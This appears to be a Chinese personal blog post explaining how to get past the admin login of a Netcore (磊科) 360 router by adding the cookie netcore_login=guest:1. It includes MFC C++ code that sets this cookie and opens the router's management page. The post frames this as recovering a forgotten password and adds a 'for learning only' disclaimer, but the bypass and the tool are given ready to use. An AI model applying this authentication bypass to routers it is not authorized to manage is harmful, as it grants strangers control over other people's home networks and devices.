老爸这里用的是磊科360第二代安全路由器,由于我的手机连不上 WIFI ,因此我需要登录路由器看看,但是我把路由器的密码给忘记了,试了几个可能的密码都没有能登录进去,又不想恢复路由器的默认设置,只能去网上搜索一下看是否有什么方法可以进入路由器,不巧还真的让我给搜索到了。
绕过磊科路由器验证的方法
绕过的方法其实很简单,简单到只是用浏览器就可以解决,方法是:
用浏览器打开磊科路由器的登录页面,然后添加 Cookie ,Cookie 的键为 netcore_login ,值为 guest:1 ,然后刷新页面就可以进入路由器的管理页面了。
我不知道这个漏洞影响该路由器的多少版本,但是我试过之后的确可以进去。具体的操作方法就不记录,浏览器的 F12 就可以搞定了。截图看一下效果:
代码实现
\方法不复杂,但是每次设置还是比较麻烦,而且也不是每个人都愿意去设置或者会设置,因此写一个简单的程序出来。
\打开 VS 2012 创建一个 MFC 项目,然后在项目中放置一个 Microsoft Web Browser 控件,将控件关联一个变量,名为 m_webCtrl 。再添加一个 编辑框 和一个 按钮 控件,给该按钮添加一个 单击 事件,代码如下:
CString strRouteIp;
GetDlgItemText(IDC_ROUTE_IP, strRouteIp);
if ( strRouteIp.GetLength() == 0 )
{
MessageBox("请输入IP地址");
return ;
}
InternetSetCookieEx(strRouteIp, "netcore_login", "guest:1", INTERNET_COOKIE_HTTPONLY, NULL);
m_WebCtrl.Navigate(strRouteIp, NULL, NULL, NULL, NULL);
运行结果如下图所示。
非常的简单~!!!
注:该方法只是用来进行学习,请勿干什么不好的事情!该方法不确定适用于 磊科 路由器的哪些版本。
我的微信公众号:“码农UP2U”
